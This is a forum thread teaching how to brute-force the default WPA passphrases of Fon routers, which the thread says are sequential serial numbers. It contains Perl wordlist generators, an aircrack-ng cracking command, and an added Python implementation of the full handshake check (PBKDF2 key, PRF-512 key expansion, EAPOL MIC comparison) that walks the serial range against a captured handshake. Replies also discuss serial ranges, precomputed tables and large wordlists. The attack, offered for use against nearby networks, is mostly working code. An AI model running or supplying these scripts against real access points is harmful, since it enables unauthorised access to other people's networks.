How to Bruteforce a WPA Fon Wlan

    Hey Community,

    In this little tutorial I'm going to show you how to bruteforce nearby Fon routers.

    So the interesting thing which I noted is that a Fon AP's default WPA passphrase is its serial number, printed under the box. These serial numbers are sequential, thus making it very easy to guess their entire range.

    So for this I use a little Perl script which generates a file including all numbers from 807200000 to 8702555555:
    #!/usr/bin/perl
    use strict;
    use warnings;
    # Append every serial candidate in the range to numbers.txt, one per line.
    # Note: each iteration spawns a shell and an echo process for a single number.
    my $n = 8702000000;
    while ($n <= 8702555555) { system("echo $n >> numbers.txt"); $n++; }
    So then we need a WPA handshake to try it on. I'm not going to describe how you get one because there are a million posts about it.

    Then we simply use aircrack-ng and start bruteforcing:

    aircrack-ng fon-01.cap -w /root/fon/numbers.txt

    So this is it Cracked.

    If you have further questions, feel free to PM me or visit my blog.
    In German = My_0wn_Remote
    In English = my_english_remote

    I also created a little tutorial video for this whole thing:

    YouTube - How to Bruteforce a nearby WPA Fon Wlan

    Maybe it is worth putting in the video section, I can't judge.

    =) Reeth

    orange
    included all Numbers from 807200000 till 8702555555
    How do you come to that assumption? I have 7 Foneras (2100 model) and all my serial numbers are out of that particular range. JFYI, there have already been some efforts from FoneraHacks forum member verticalfall to create precomputed WPA tables for the MyPlace SSID (covering several ranges of Fonera serial numbers) - unfortunately I cannot find the link currently though.

    Nice project!

    hey or4n9e
    Yeah, that could be possible, that it doesn't fit in your country. Maybe they change the serial numbers in different countries... but I don't think so...
    I also have 2 Fonera 2100 routers, but they all have S/Ns with 8072.... numbers...

    Gitsnik
    The Crystal Wind


    Quote originally posted by Reeth:
    but they all got S/N with 8072....Numbers...
    Have a look through the various forums around the place, I can assure you that, like the man said, they do not all fall within the 8072 range.

    That said, the sheer size of the serial key notwithstanding, you could just compute the numerics for all the possibilities at that width of serial numbers (10^10 or something - it's early and my math-fu is weak without coffee). It wouldn't even be hard to do, so let me try to hack something up while I write this post (it will be untested):
    open(DICT, ">outputfile.txt") || die "Bugger: $!";
    my $i = 0;
    while ($i < 10000000000) {
        my $j = sprintf("%010d", $i);   # zero-pad every candidate to the 10-digit width
        print DICT "$j\n";
        $i++;
    }
    close(DICT);
    The numbers are large, you are dealing with 10,000,000,000 possibilities which is a lot, a pyrit box might be able to generate them fast enough, but for my taste that is a bit of a stretch.

    That would work for any 10 numeric digit WPA key by the way, and removes the need for targeted mishaps like the original.

    Also it removes that terrible call to echo which would slow the generation down.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
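An added example, my own code rather than Reeth's or Gitsnik's: it builds the same numeric-serial keyspace as both Perl scripts above (any start, stop and zero-padded width, generated lazily instead of written to disk) and runs each candidate through the check aircrack-ng actually performs on a WPA handshake, PBKDF2 for the PMK, PRF-512 for the KCK, then the MIC over the second EAPOL-Key frame. Everything about the handshake is constructed for the demo: the MAC addresses, nonces, EAPOL bytes and the "serial" 8702000123 are made up, the SSID MyPlace is the default Fonera SSID orange mentions, and it assumes a WPA2/CCMP network (key descriptor version 2, HMAC-SHA1 MIC), with the WPA/TKIP HMAC-MD5 variant selectable through the `version` field.

```python
"""Dictionary attack on a WPA-PSK 4-way handshake over a numeric serial keyspace."""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterator, Optional


def candidate_serials(start: int, stop: int, width: int = 10) -> Iterator[str]:
    """Yield zero-padded numeric candidates from start to stop inclusive.

    Same keyspace the Perl scripts in the thread write to a file, generated lazily:
    10^10 ten-digit lines would be roughly 110 GB on disk, a generator is free.
    """
    for n in range(start, stop + 1):
        yield f"{n:0{width}d}"


def pmk(passphrase: str, ssid: bytes) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).

    This is the expensive step (4096 HMAC rounds per candidate), which is why the
    size of the candidate list decides whether the attack is practical.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: concatenated HMAC-SHA1(key, label||0x00||data||i), i=0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def kck_from_pmk(pmk_: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """Derive the PTK and return its first 16 bytes, the Key Confirmation Key."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk_, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed, truncated to 16 bytes.

    Key descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1.
    """
    digestmod = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, eapol_mic_zeroed, digestmod).digest()[:16]


@dataclass
class Handshake:
    ssid: bytes
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol_mic_zeroed: bytes   # message 2 of the handshake with the MIC field zeroed
    mic: bytes                # the MIC value captured in that frame
    version: int = 2          # key descriptor version, see eapol_mic()


def try_passphrase(hs: Handshake, passphrase: str) -> bool:
    """True if this passphrase reproduces the captured MIC (the check aircrack-ng makes)."""
    kck = kck_from_pmk(pmk(passphrase, hs.ssid), hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
    return hmac.compare_digest(eapol_mic(kck, hs.eapol_mic_zeroed, hs.version), hs.mic)


def crack(hs: Handshake, start: int, stop: int, width: int = 10) -> Optional[str]:
    """Walk the numeric range and return the first serial that validates, else None."""
    for cand in candidate_serials(start, stop, width):
        if try_passphrase(hs, cand):
            return cand
    return None


def build_sample_handshake(passphrase: str) -> Handshake:
    """Constructed stand-in for a captured handshake: every value here is made up.

    The MIC is computed from `passphrase`, so the attack has something to verify.
    """
    hs = Handshake(
        ssid=b"MyPlace",                          # default Fonera SSID named in the thread
        ap_mac=bytes.fromhex("001122334455"),     # assumed, not a real Fonera MAC
        sta_mac=bytes.fromhex("66778899aabb"),
        anonce=bytes(range(32)),
        snonce=bytes(range(32, 64)),
        eapol_mic_zeroed=bytes.fromhex("0103007502010a00") + b"\x00" * 109,  # placeholder frame
        mic=b"",
    )
    kck = kck_from_pmk(pmk(passphrase, hs.ssid), hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
    hs.mic = eapol_mic(kck, hs.eapol_mic_zeroed, hs.version)
    return hs


# Constructed example: pretend the AP's default key (its serial number) is 8702000123.
SAMPLE = build_sample_handshake("8702000123")

if __name__ == "__main__":
    # Search only a slice of the 8702000000-8702555555 range so the demo finishes quickly.
    print(crack(SAMPLE, 8702000000, 8702000200))
```

The per-candidate cost is the 4096-round PBKDF2, roughly a millisecond in CPython, so a few hundred thousand sequential serials finish in minutes while the full 10^10 space Gitsnik describes is out of reach without GPU or precomputed tables; that cost is also why orange's mention of precomputed tables for the fixed MyPlace SSID matters, since PBKDF2 is salted with the SSID and tables only apply to that one name.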

    Snayler
    My fon S/N starts with 8704... Seems that the only number that repeats itself is the first "8"...

    I have a word list which contains all possible combinations of 10 digit hex and it is about 37 gigs, just FYI

